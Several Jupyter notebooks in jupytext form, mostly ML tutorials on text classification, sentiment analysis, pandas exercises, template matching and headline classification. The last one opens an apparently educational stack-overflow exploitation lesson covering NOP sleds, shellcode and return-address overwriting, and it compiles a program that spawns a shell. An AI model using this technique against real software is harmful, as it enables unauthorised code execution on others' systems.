# ## Accuracy of UNKNOWN Data using CV with Logistic Regression
#
predictions = cvModel.transform(dfUN)
# Evaluate best model
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## CLASSIFICATION USING "RANDOM FOREST"
# +
from pyspark.ml.classification import RandomForestClassifier
rf = RandomForestClassifier(labelCol="label", \
featuresCol="features", \
numTrees = 100, \
maxDepth = 4, \
maxBins = 32)
pipelineRF = Pipeline(stages=[regexTokenizer, remover, hashingTF, idf, label_stringIdx, rf])
# Train model with Training Data
rfModel = pipelineRF.fit(trainingData)
predictions = rfModel.transform(testData)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
# -
# ## Accuracy of Test Data using "Random Forest"
#
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## Accuracy of UNKNOWN Data using "Random Forest"
#
predictions = rfModel.transform(dfUN)
predictions.filter(predictions['prediction'] == 0) \
.select("Category","features","probability","label","prediction") \
.orderBy("probability", ascending=False) \
.show(n = 10, truncate = 30)
evaluator = MulticlassClassificationEvaluator(predictionCol="prediction")
evaluator.evaluate(predictions)
# ## ASSESSMENT:
#
#
# #### Accuracy of Unknown Dataset on Various Models:
# ##### Logistic Regression: $0.918297808424174$
# ##### Naive Bayes : $0.9387861118473364$
# ##### Cross Validation Using Logistic Regression : $0.9796340896607091$
# ##### Random Forest : $0.8011736273456751$
#
# #### Clearly, cross validation yields the highest accuracy.
# #### Random forest is not a good choice for high-dimensional sparse data.
#
# ### Conclusion: Logistic Regression Using Cross Validation is the best model in our analysis
#
#
# Source: NYT-article-classification/more data groups/Text Classification Using PYSPARK.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# + [markdown] _uuid="51c9a7de75c84275c65ca97e23d4a911fc38e246"
# The dataset is comprised of tab-separated files with phrases from the Rotten Tomatoes dataset. The train/test split has been preserved for the purposes of benchmarking, but the sentences have been shuffled from their original order. Each Sentence has been parsed into many phrases by the Stanford parser. Each phrase has a PhraseId. Each sentence has a SentenceId. Phrases that are repeated (such as short/common words) are only included once in the data.
#
# train.tsv contains the phrases and their associated sentiment labels.
# test.tsv contains just phrases.
#
#
# The sentiment labels are:
# 0 - negative
# 1 - somewhat negative
# 2 - neutral
# 3 - somewhat positive
# 4 - positive
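# The sentiment labels above are just integer codes; a small mapping makes model output readable later on:

```python
# Mapping of the dataset's sentiment codes to human-readable names.
SENTIMENT_NAMES = {
    0: "negative",
    1: "somewhat negative",
    2: "neutral",
    3: "somewhat positive",
    4: "positive",
}

def decode(predictions):
    """Translate a sequence of integer class predictions into label names."""
    return [SENTIMENT_NAMES[p] for p in predictions]

assert decode([4, 2, 0]) == ["positive", "neutral", "negative"]
```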
# + _uuid="243e4f9b40ab8a69e682a13d0adee4bfaa4acb6c"
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder
import textblob
# + _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19" _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5"
print("Loading data...")
train = pd.read_csv("../input/movie-review-sentiment-analysis-kernels-only/train.tsv", sep="\t")
print("Train shape:", train.shape)
test = pd.read_csv("../input/movie-review-sentiment-analysis-kernels-only/test.tsv", sep="\t")
print("Test shape:", test.shape)
# + _uuid="129bb2635ee6f2c18ff47dde3df2c268324b541a"
train.head()
# + _uuid="e2eeea8d70a649b106c651734af609dccac869ba"
enc = OneHotEncoder(sparse=False)
enc.fit(train["Sentiment"].values.reshape(-1, 1))
print("Number of classes:", enc.n_values_[0])
print("Class distribution:\n{}".format(train["Sentiment"].value_counts()/train.shape[0]))
# + _uuid="06791fd967e6bfa9130f86a6317dd3b22f640a61"
train["Sentiment"].value_counts().plot.bar()
# + _uuid="04bea1b921fb53f77ee8b069d864d2c103fec0ff"
from sklearn.feature_extraction.text import CountVectorizer
train_cv = CountVectorizer()
train_cv.fit(train["Phrase"])
test_cv = CountVectorizer()
test_cv.fit(test["Phrase"])
print("Train Set Vocabulary Size:", len(train_cv.vocabulary_))
print("Test Set Vocabulary Size:", len(test_cv.vocabulary_))
print("Number of Words that occur in both:", len(set(train_cv.vocabulary_.keys()).intersection(set(test_cv.vocabulary_.keys()))))
# + [markdown] _uuid="2d0cefa184547a5e02f5f389216e1a496f90e982"
# **Add Numerical Features**
# + _uuid="2b4043b8831b8a42bd946f762375a3a97516dfc2"
def add_num_feature_to_df(df):
df["phrase_count"] = df.groupby("SentenceId")["Phrase"].transform("count")
df["word_count"] = df["Phrase"].apply(lambda x: len(x.split()))
df["has_upper"] = df["Phrase"].apply(lambda x: x.lower() != x)
df["sentence_end"] = df["Phrase"].apply(lambda x: x.endswith("."))
df["after_comma"] = df["Phrase"].apply(lambda x: x.startswith(","))
df["sentence_start"] = df["Phrase"].apply(lambda x: "A" <= x[0] <= "Z")
df["Phrase"] = df["Phrase"].apply(lambda x: x.lower())
return df
train = add_num_feature_to_df(train)
test = add_num_feature_to_df(test)
dense_features = ["phrase_count", "word_count", "has_upper", "after_comma", "sentence_start", "sentence_end"]
train.groupby("Sentiment")[dense_features].mean()
# + _uuid="ea42c5a316e953cf6740f2798bd3e9b78d4447b9"
train.head()
# + [markdown] _uuid="572a4bda2d8b1cd035f9c6fffa403e7f1b0fbbe4"
# **Transfer Learning Using GLOVE Embeddings**
# + _uuid="3e18956c6b5c5c88e7097c41138a2afb3f4bc1e1"
EMBEDDING_FILE = "../input/glove-global-vectors-for-word-representation/glove.6B.100d.txt"
EMBEDDING_DIM = 100
all_words = set(train_cv.vocabulary_.keys()).union(set(test_cv.vocabulary_.keys()))
def get_embedding():
embeddings_index = {}
emp_f = open(EMBEDDING_FILE)
for line in emp_f:
values = line.split()
word = values[0]
if len(values) == EMBEDDING_DIM + 1 and word in all_words:
coefs = np.asarray(values[1:], dtype="float32")
embeddings_index[word] = coefs
emp_f.close()
return embeddings_index
embeddings_index = get_embedding()
print("Number of words that don't exist in GLOVE:", len(all_words - set(embeddings_index)))
# + [markdown] _uuid="2f93b76d710ea94ed48627babc49bc5261647789"
# **Prepare the sequences for LSTM**
# + _uuid="5d2f6c292c46b367b0ae7f98f8a1fbafc163a0e0"
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
MAX_SEQUENCE_LENGTH = 70
tokenizer = Tokenizer()
tokenizer.fit_on_texts(np.append(train["Phrase"].values, test["Phrase"].values))
word_index = tokenizer.word_index
nb_words = len(word_index) + 1
embedding_matrix = np.random.rand(nb_words, EMBEDDING_DIM + 2)
for word, i in word_index.items():
embedding_vector = embeddings_index.get(word)
sent = textblob.TextBlob(word).sentiment
if embedding_vector is not None:
embedding_matrix[i] = np.append(embedding_vector, [sent.polarity, sent.subjectivity])
else:
embedding_matrix[i, -2:] = [sent.polarity, sent.subjectivity]
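# The matrix construction above keeps the random init and overlays pretrained data where available; a toy NumPy sketch of the same idea (sizes and sentiment values are made up):

```python
import numpy as np

nb_words, dim = 5, 4                        # toy vocabulary and embedding sizes
matrix = np.random.rand(nb_words, dim + 2)  # two extra columns for polarity/subjectivity
vec = np.ones(dim)                          # stand-in for a pretrained GloVe vector
matrix[2] = np.append(vec, [0.5, 0.1])      # in-vocabulary word: overwrite the whole row
matrix[3, -2:] = [-0.2, 0.9]                # OOV word: keep random init, set sentiment only
print(matrix.shape)  # (5, 6)
```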
# + [markdown] _uuid="d7f3d8de4369b676ffab460533ace55ed08a10ab"
# **Define the Model**
# + _uuid="878174c7d497cf794531afbcc8d81b5f59c803dd"
from keras.layers import *
from keras.models import Model
from keras.callbacks import EarlyStopping, ModelCheckpoint
def build_model():
embedding_layer = Embedding(nb_words,
EMBEDDING_DIM + 2,
weights=[embedding_matrix],
input_length=MAX_SEQUENCE_LENGTH,
trainable=True)
dropout = SpatialDropout1D(0.25)
mask_layer = Masking()
lstm_layer = LSTM(200)
seq_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype="int32")
dense_input = Input(shape=(len(dense_features),))
dense_vector = BatchNormalization()(dense_input)
phrase_vector = lstm_layer(mask_layer(dropout(embedding_layer(seq_input))))
feature_vector = concatenate([phrase_vector, dense_vector])
feature_vector = Dense(150, activation="relu")(feature_vector)
feature_vector = Dense(50, activation="relu")(feature_vector)
output = Dense(5, activation="softmax")(feature_vector)
model = Model(inputs=[seq_input, dense_input], outputs=output)
return model
# + [markdown] _uuid="6879dab4a2dc2daa0a63ab689a7a579a4c4baa5e"
# **Train the Model:**
# + _uuid="6fbcaac73703c1d1c67f3ca439e7023e6f0bf2b1"
train_seq = pad_sequences(tokenizer.texts_to_sequences(train["Phrase"]), maxlen=MAX_SEQUENCE_LENGTH)
test_seq = pad_sequences(tokenizer.texts_to_sequences(test["Phrase"]), maxlen=MAX_SEQUENCE_LENGTH)
# + _uuid="0d4cdf9226840afc92b25b0ca75b4ff520dabf7b"
train_dense = train[dense_features]
y_train = enc.transform(train["Sentiment"].values.reshape(-1, 1))
print("Building the model...")
model = build_model()
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["acc"])
early_stopping = EarlyStopping(monitor="val_acc", patience=2, verbose=1)
model_save_path = "./model.hdf5"
model_checkpoint = ModelCheckpoint(model_save_path, monitor='val_acc', save_best_only=True, mode='max', verbose=1)
print("Training the model...")
model.fit([train_seq, train_dense], y_train, validation_split=0.15,
epochs=15, batch_size=512, shuffle=True, callbacks=[early_stopping, model_checkpoint], verbose=1)
# + _uuid="51b72d89f24f76c696d3d11523f023a9c3ed4ae3"
|
rotten_tomatoes_sentiment_model_trainer/notebooks/.ipynb_checkpoints/rotten_tomatoes_lstm_sentiment-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
df = pd.read_csv('./Football teams.csv')
df
# -
# The information for each column is described at the link below.
#
# https://www.kaggle.com/varpit94/football-teams-rankings-stats
#
# ## Assignments 1
# Extract the top 5 teams with the highest pass success rate.
# (hint: sort_values, head)
A1 = df.sort_values('Pass%',ascending = False).head()
A1
# ## Assignments 2
# Extract every team whose possession is 60% or higher.
A2 = df[df['Possession%']>=60]
A2
# ## Assignments 3
# Which of the five major leagues is the roughest? First sort the leagues by number of yellow cards, then order by yellow_cards and red_cards!
# (hint: groupby, sum, loc)
A3 = df.groupby('Tournament').sum().sort_values(['yellow_cards', 'red_cards'], ascending=False)
A3 = A3.loc[:, ['yellow_cards', 'red_cards']]
A3
# ## Assignments 4
#
# Come to think of it, we should account for red cards as well. Score a red card as 5 points and a yellow card as 2 points, then sort by that score to see which league is truly the roughest!
#
# Oh right, df['A'] = df['B'] * 5 + df['C'] * 2
#
# Creating a new column like that should do the trick, right?
A4 = A3.copy()  # copy so the score column isn't silently added to A3 as well
A4['score'] = A4['red_cards'] * 5 + A4['yellow_cards'] * 2
A4
# ## Assignments 5
# Hmm... I'd like to look into the relationship between pass success rate and possession. Can we see it from a linear point of view? Computing the covariance matrix with numpy should tell us...
#
# hint: to_numpy, T, cov
# +
A5 = df[['Pass%','Possession%']].to_numpy().T
np.cov(A5)
# -
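# np.cov puts variances on the diagonal and covariances off it, so the Pearson correlation can be recovered by normalizing; a toy check with two perfectly linear rows:

```python
import numpy as np

a = np.array([[1.0, 2.0, 3.0],
              [2.0, 4.0, 6.0]])           # second row is exactly 2x the first
c = np.cov(a)                             # 2x2 covariance matrix
r = c[0, 1] / np.sqrt(c[0, 0] * c[1, 1])  # Pearson correlation from covariance
print(r)  # 1.0
```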
|
assignments/FacerAin/02-YongwooSong.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# fddab748-7a0a-4269-9584-0925c39b973f
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
import cv2
from PIL import Image, ImageOps
import albumentations as A
data = pd.read_csv("../../data/raw/data.csv")
folder_name = "fddab748-7a0a-4269-9584-0925c39b973f"
image_path = "../../data/raw/data/" + folder_name + "/270.jpg"
img = cv2.imread(image_path)
# + pycharm={"name": "#%%\n"}
template = cv2.imread("krugovi.png")
template.shape
# template.shape is (h, w, channels); reversed, it unpacks as (channels, w, h)
_, w, h = template.shape[::-1]
res = cv2.matchTemplate(img, template, cv2.TM_SQDIFF)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc  # TM_SQDIFF: lower is better, so the best match is at the minimum
bottom_right = (top_left[0] + w, top_left[1] + h)
plt.figure(figsize=(10, 10))
cv2.rectangle(img, top_left, bottom_right, 255, 2)
plt.subplot(131), plt.imshow(res, cmap='gray')
plt.title('Matching Result'), plt.xticks([]), plt.yticks([])
plt.subplot(132), plt.imshow(img, cmap='gray')
plt.title('Detected Point'), plt.xticks([]), plt.yticks([])
plt.subplot(133), plt.imshow(template)
plt.show()
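# Because TM_SQDIFF measures squared difference, the best match is the minimum of the result map (hence min_loc above); a tiny NumPy sketch of the same sliding-window idea:

```python
import numpy as np

img = np.zeros((6, 6))
img[2:4, 3:5] = 1.0                # toy image with a bright 2x2 patch
tmpl = np.ones((2, 2))             # template to look for
best, loc = None, None
for y in range(img.shape[0] - 1):  # slide the template over every position
    for x in range(img.shape[1] - 1):
        ssd = np.sum((img[y:y + 2, x:x + 2] - tmpl) ** 2)
        if best is None or ssd < best:
            best, loc = ssd, (x, y)
print(loc)  # (3, 2): top-left corner of the match
```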
|
notebooks/naive_modeling/template_matching.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Tessellate-Imaging/monk_v1/blob/master/study_roadmaps/1_getting_started_roadmap/5_update_hyperparams/1_model_params/5)%20Switch%20deep%20learning%20model%20from%20default%20mode.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# -
# # Goals
#
#
# ### Learn how to switch models post default mode
# # Table of Contents
#
#
# ## [0. Install](#0)
#
#
# ## [1. Load experiment with resnet defaults](#1)
#
#
# ## [2. Change model to densenet ](#2)
#
#
# ## [3. Train](#3)
# <a id='0'></a>
# # Install Monk
#
# - git clone https://github.com/Tessellate-Imaging/monk_v1.git
#
# - cd monk_v1/installation/Linux && pip install -r requirements_cu9.txt
# - (Select the requirements file as per OS and CUDA version)
# !git clone https://github.com/Tessellate-Imaging/monk_v1.git
# Select the requirements file as per OS and CUDA version
# !cd monk_v1/installation/Linux && pip install -r requirements_cu9.txt
# ## Dataset - Weather Classification
# - https://data.mendeley.com/datasets/4drtyfjtfy/1
# ! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1pxe_AmHYXwpTMRkMVwGeFgHS8ZpkzwMJ' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1pxe_AmHYXwpTMRkMVwGeFgHS8ZpkzwMJ" -O weather.zip && rm -rf /tmp/cookies.txt
# ! unzip -qq weather.zip
# # Imports
# Monk
import os
import sys
sys.path.append("monk_v1/monk/");
#Using mxnet-gluon backend
from gluon_prototype import prototype
# <a id='1'></a>
# # Load experiment with resnet defaults
gtf = prototype(verbose=1);
gtf.Prototype("Project", "experiment-switch-models");
# +
gtf.Default(dataset_path="weather/train",
model_name="resnet18_v1",
freeze_base_network=True, # If True, then freeze base
num_epochs=5);
#Read the summary generated once you run this cell.
# -
# ## As per the summary above
# Model Loaded on device
# Model name: resnet18_v1
# Num of potentially trainable layers: 41
# Num of actual trainable layers: 1
# <a id='2'></a>
# # Switch now to densenet
# +
gtf.update_model_name("densenet121");
# Very important to reload the network after switching models
gtf.Reload();
# -
# <a id='3'></a>
# # Train
# +
#Start Training
gtf.Train();
#Read the training summary generated once you run the cell and training is completed
# -
|
study_roadmaps/1_getting_started_roadmap/5_update_hyperparams/1_model_params/5) Switch deep learning model from default mode.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_tensorflow_p36
# language: python
# name: conda_tensorflow_p36
# ---
# # End-to-End NLP: News Headline Classifier (Local Version)
#
# This notebook trains a PyTorch-based model to classify news headlines into four categories: Business (b), Entertainment (e), Health & Medicine (m) and Science & Technology (t).
#
# The model is trained and evaluated here on the notebook instance itself - and we'll show in the follow-on notebook how to take advantage of Amazon SageMaker to separate these infrastructure needs.
#
# First install some libraries which might not be available across all kernels (e.g. in Studio):
# !pip install ipywidgets
# !pip install torchtext # Depending on your PyTorch version https://pypi.org/project/torchtext/
# ### Download News Aggregator Dataset
#
# We will download our dataset from the **UCI Machine Learning Database** public repository. The dataset is the News Aggregator Dataset and we will use the newsCorpora.csv file. This dataset contains a table of news headlines and their corresponding classes.
#
# +
# %%time
import util.preprocessing
util.preprocessing.download_dataset()
# -
# ### Let's visualize the dataset
#
# We will load the newsCorpora.csv file to a Pandas dataframe for our data processing work.
#
import os
import re
import numpy as np
import pandas as pd
column_names = ["TITLE", "URL", "PUBLISHER", "CATEGORY", "STORY", "HOSTNAME", "TIMESTAMP"]
df = pd.read_csv("data/newsCorpora.csv", names=column_names, header=None, delimiter="\t")
df.head()
# For this exercise we'll **only use**:
#
# - The **title** (Headline) of the news story, as our input
# - The **category**, as our target variable
#
df["CATEGORY"].value_counts()
# The dataset has four article categories: Business (b), Entertainment (e), Health & Medicine (m) and Science & Technology (t).
#
# ## Natural Language Pre-Processing
#
# We'll do some basic processing of the text data to convert it into numerical form that the algorithm will be able to consume to create a model.
#
# We will do typical pre-processing for NLP workloads: dummy-encoding the labels, tokenizing the documents, setting fixed sequence lengths for the input feature dimension, and padding documents to fixed-length input vectors.
#
# ### Dummy Encode the Labels
#
encoded_y, labels = util.preprocessing.dummy_encode_labels(df, "CATEGORY")
print(labels)
print(encoded_y)
df["CATEGORY"][1]
encoded_y[0]
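# Dummy (one-hot) encoding maps each class label to a unit vector; a minimal pure-Python sketch over the four category codes (the real encoding is done inside util.preprocessing, whose implementation is not shown here):

```python
labels = ["b", "e", "m", "t"]  # Business, Entertainment, Medicine, Sci/Tech

def one_hot(label):
    vec = [0.0] * len(labels)
    vec[labels.index(label)] = 1.0
    return vec

print(one_hot("m"))  # [0.0, 0.0, 1.0, 0.0]
```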
# ### Tokenize and Set Fixed Sequence Lengths
#
# We want to describe our inputs at the more meaningful word level (rather than individual characters), and ensure a fixed length of the input feature dimension.
#
# + _cell_guid="7bcf422f-0e75-4d49-b3b1-12553fcaf4ff" _uuid="46b7fc9aef5a519f96a295e980ba15deee781e97"
processed_docs, tokenizer = util.preprocessing.tokenize_and_pad_docs(df, "TITLE")
# -
df["TITLE"][1]
processed_docs[0]
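# Fixed sequence lengths mean short headlines get padded and long ones truncated; a pure-Python sketch, assuming Keras-style 'pre' padding and truncation with 0 as the reserved padding id:

```python
MAX_LEN = 5

def pad(seq, max_len=MAX_LEN):
    seq = seq[-max_len:]                     # 'pre' truncation: drop the oldest tokens
    return [0] * (max_len - len(seq)) + seq  # 'pre' padding with the reserved id 0

print(pad([4, 8, 15]))          # [0, 0, 4, 8, 15]
print(pad([1, 2, 3, 4, 5, 6]))  # [2, 3, 4, 5, 6]
```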
# ### Import Word Embeddings
#
# To represent our words in numeric form, we'll use pre-trained vector representations for each word in the vocabulary: In this case we'll be using pre-built GloVe word embeddings.
#
# You could also explore training custom, domain-specific word embeddings using SageMaker's built-in [BlazingText algorithm](https://docs.aws.amazon.com/sagemaker/latest/dg/blazingtext.html). See the official [blazingtext_word2vec_text8 sample](https://github.com/awslabs/amazon-sagemaker-examples/tree/master/introduction_to_amazon_algorithms/blazingtext_word2vec_text8) for an example notebook showing how.
#
# %%time
embedding_matrix = util.preprocessing.get_word_embeddings(tokenizer, "data/embeddings")
np.save(
file="./data/embeddings/docs-embedding-matrix",
arr=embedding_matrix,
allow_pickle=False,
)
vocab_size=embedding_matrix.shape[0]
print(embedding_matrix.shape)
# ### Split Train and Test Sets
#
# Finally we need to divide our data into model training and evaluation sets:
#
# +
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(
processed_docs,
encoded_y,
test_size=0.2,
random_state=42
)
# -
# Do you always remember to save your datasets for traceability when experimenting locally? ;-)
os.makedirs("./data/train", exist_ok=True)
np.save("./data/train/train_X.npy", x_train)
np.save("./data/train/train_Y.npy", y_train)
os.makedirs("./data/test", exist_ok=True)
np.save("./data/test/test_X.npy", x_test)
np.save("./data/test/test_Y.npy", y_test)
# ## Define the Model
#
# +
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
seed = 42
np.random.seed(seed)
num_classes=len(labels)
# -
class Net(nn.Module):
def __init__(self, vocab_size = 400000, num_classes = 4):
super(Net, self).__init__()
self.embedding = nn.Embedding(vocab_size, 100)
self.conv1 = nn.Conv1d(100, 128, kernel_size=3)
self.max_pool1d = nn.MaxPool1d(5)
self.flatten1 = nn.Flatten()
self.dropout1 = nn.Dropout(p=0.3)
self.fc1 = nn.Linear(896, 128)
self.fc2 = nn.Linear(128, num_classes)
def forward(self, x):
x = self.embedding(x)
x = torch.transpose(x,1,2)
x = self.flatten1(self.max_pool1d(self.conv1(x)))
x = self.dropout1(x)
x = F.relu(self.fc1(x))
x = self.fc2(x)
        return F.softmax(x, dim=1)  # dim=1: softmax over the class dimension
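# The 896 in nn.Linear(896, 128) follows from the conv/pool shape arithmetic, assuming the padded sequence length is 40 (that length is set by the preprocessing, not shown in this notebook):

```python
seq_len, kernel, pool, channels = 40, 3, 5, 128  # seq_len is an assumption
conv_out = seq_len - kernel + 1                  # Conv1d, stride 1, no padding
pool_out = conv_out // pool                      # MaxPool1d(5)
flat = channels * pool_out                       # flattened size feeding fc1
print(conv_out, pool_out, flat)  # 38 7 896
```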
# ## Define Train and Helper Functions
#
# +
def test(model, test_loader, device):
model.eval()
test_loss = 0.0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
            test_loss += F.binary_cross_entropy(output, target, reduction='mean').item()  # accumulate mean batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
target_index = target.max(1, keepdim=True)[1]
correct += pred.eq(target_index).sum().item()
test_loss /= len(test_loader.dataset)
print("val_loss: {:.4f}".format(test_loss))
print("val_acc: {:.4f}".format(correct/len(test_loader.dataset)))
def train(train_loader, test_loader, embedding_matrix, vocab_size = 400000, num_classes = 4, epochs = 12, learning_rate = 0.001):
###### Setup model architecture ############
model = Net(vocab_size, num_classes)
model.embedding.weight = torch.nn.parameter.Parameter(torch.FloatTensor(embedding_matrix), False)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model.to(device)
optimizer = optim.RMSprop(model.parameters(), lr=learning_rate)
for epoch in range(1, epochs + 1):
model.train()
running_loss = 0.0
for batch_idx, (X_train, y_train) in enumerate(train_loader, 1):
data, target = X_train.to(device), y_train.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.binary_cross_entropy(output, target)
loss.backward()
optimizer.step()
running_loss += loss.item()
print("epoch: {}".format(epoch))
print("train_loss: {:.6f}".format(running_loss / (len(train_loader.dataset))))
print("Evaluating model")
test(model, test_loader, device)
return model
# -
class Dataset(torch.utils.data.Dataset):
def __init__(self, data, labels):
'Initialization'
self.labels = labels
self.data = data
def __len__(self):
'Denotes the total number of samples'
return len(self.data)
def __getitem__(self, index):
# Load data and get label
X = torch.as_tensor(self.data[index]).long()
y = torch.as_tensor(self.labels[index])
return X, y
# ## Fit (Train) and Evaluate the Model
#
# %%time
# fit the model here in the notebook:
epochs = 1
learning_rate = 0.001
model_dir = 'model/'
trainloader = torch.utils.data.DataLoader(Dataset(x_train, y_train), batch_size=16,
shuffle=True)
testloader = torch.utils.data.DataLoader(Dataset(x_test, y_test), batch_size=1,
shuffle=True )
print("Training model")
model = train(trainloader, testloader, embedding_matrix,
vocab_size=vocab_size, num_classes=num_classes, epochs=epochs, learning_rate=learning_rate)
# ## (**JupyterLab / SageMaker Studio Only**) Installing IPyWidgets Extension
#
# This notebook uses a fun little interactive widget to query the classifier, which works out of the box in plain Jupyter on a SageMaker Notebook Instance - but in JupyterLab or SageMaker Studio requires an extension not installed by default.
#
# **If you're using JupyterLab on a SageMaker Notebook Instance**, you can install it via UI:
#
# - Select "*Settings > Enable Extension Manager (experimental)*" from the toolbar, and confirm to enable it
# - Click on the new jigsaw puzzle piece icon in the sidebar, to open the Extension Manager
# - Search for `@jupyter-widgets/jupyterlab-manager` (Scroll down - search results show up *below* the list of currently installed widgets!)
# - Click "**Install**" below the widget's description
# - Wait for the blue progress bar that appears by the search box
# - You should be prompted "*A build is needed to include the latest changes*" - select "**Rebuild**"
# - The progress bar should resume, and you should shortly see a "Build Complete" dialogue.
# - Select "**Reload**" to reload the webpage
#
# **If you're using SageMaker Studio**, you can install it via CLI:
#
# - Open a new launcher and select **System terminal** (and **not** *Image terminal*)
# - Change to the repository root folder (e.g. with `cd sagemaker-workshop-101`) and check with `pwd` (print working directory)
# - Run `./init-studio.sh` and refresh your browser page when the script is complete.
#
# ## Use the Model (Locally)
#
# Let's evaluate our model with some example headlines...
#
# If you struggle with the widget, you can always simply call the `classify()` function from Python. You can be creative with your headlines!
#
# +
from IPython import display
import ipywidgets as widgets
def classify(text):
"""Classify a headline and print the results"""
processed = tokenizer.preprocess(text)
padded = tokenizer.pad([processed])
final_text = []
for w in padded[0]:
final_text.append(tokenizer.vocab.stoi[w])
final_text = torch.tensor([final_text])
model.cpu()
model.eval()
result = model(final_text)
print(result)
ix = np.argmax(result.detach())
print(f"Predicted class: '{labels[ix]}' with confidence {result[0][ix]:.2%}")
interaction = widgets.interact_manual(
classify,
text=widgets.Text(
value="The markets were bullish after news of the merger",
placeholder="Type a news headline...",
description="Headline:",
layout=widgets.Layout(width="99%"),
)
)
interaction.widget.children[1].description = "Classify!"
# -
# ## Review
#
# In this notebook we pre-processed publicly downloadable data and trained a neural news headline classifier model: As a data scientist might normally do when working on a local machine.
#
# ...But can we use the cloud more effectively to allocate high-performance resources; and easily deploy our trained models for use by other applications?
#
# Head on over to the next notebook, [Headline Classifier SageMaker.ipynb](Headline%20Classifier%20SageMaker.ipynb), where we'll show how the same model can be trained and then deployed on specific target infrastructure with Amazon SageMaker.
#
|
pytorch_alternatives/custom_pytorch_nlp/Headline Classifier Local.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # MNIST Handwritten Digit Recognition with the Keras Framework
from keras.datasets import mnist
from keras.utils import np_utils
from keras.models import Sequential
from keras.layers import Dense, Activation, Convolution2D, MaxPooling2D, Flatten
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
# ## 1 Data Acquisition and Processing
# a> Import the data via Keras's built-in dataset module
# b> Reshape the train and test sets with channels first; -1 means any number of samples
# c> Convert the labels to one-hot form, i.e. a binary 0-1 class vector (1 at the digit's position, 0 elsewhere)
# d> Normalize the data so gradient descent converges faster (first convert uint8 to float)
|
.ipynb_checkpoints/keras-mnist-cnn-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Stack Overflow - Remote Code Execution
#
# - instead of sending junk and executing the existing code, send your own code and execute it!
# - for this technique to succeed, program's stack must be executable (not just read and write)
# - let's define some terminologies
#
# ### Payload
# - a buffer that contains code and data to exploit the vulnerability
# - payload typically has the following structure:
#
# ```bash
# | repeated nop sled | shellcode | repeated controlled return address |
# ```
# - offset determines the length of the payload
# - shellcode size is fixed depending on what the code is supposed to do
# - there is usually room to play with the lengths of the nop sled and the controlled return address
#
# ### nop sled
# - `\x90` - no operation instruction in assembly
# - if the buffer is large enough, use good number of NOP as a bigger cushion/wider landing zone
# - as the stack may shift a bit, it's harder to land exactly where the shellcode is
# - NOP lets you slide right into your shellcode, which spawns a shell/terminal
# - you still need to pad the controlled buffer to make it long enough to overwrite the caller's return address
#
# ### shellcode
# - shellcode is attacker's code that can do anything
# - such as creating/deleting a log file, adding a new user, change filewall rule, etc.
# - binary code that actually exploits the vulnerability
# - the most common shellcodes typically spawn a shell/terminal, local or remote (tcp connect or reverse connect)
# - lets you own the system by giving you access to the terminal
# - Shellcodes database - [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
#
# ### repeated return address
# - an address pointing somewhere inside the repeated nop sled stored in the buffer variable
# - this controlled return address should overwrite the caller's return address on the stack
#
#
# ### Example program that spawns shell/terminal
# - let's look at an example program that spawns shell/terminal on the system by calling system call
# - the `shellcode/system_shell.cpp` program uses the `system` function defined in the `<stdlib.h>` library to execute the `/bin/sh` command
# ! cat shellcode/system_shell.cpp
# + language="bash"
# input="shellcode/system_shell.cpp"
# output=system_shell.exe
# echo kali | sudo -S ./compile.sh $input $output
# -
# - run system_shell.exe from terminal
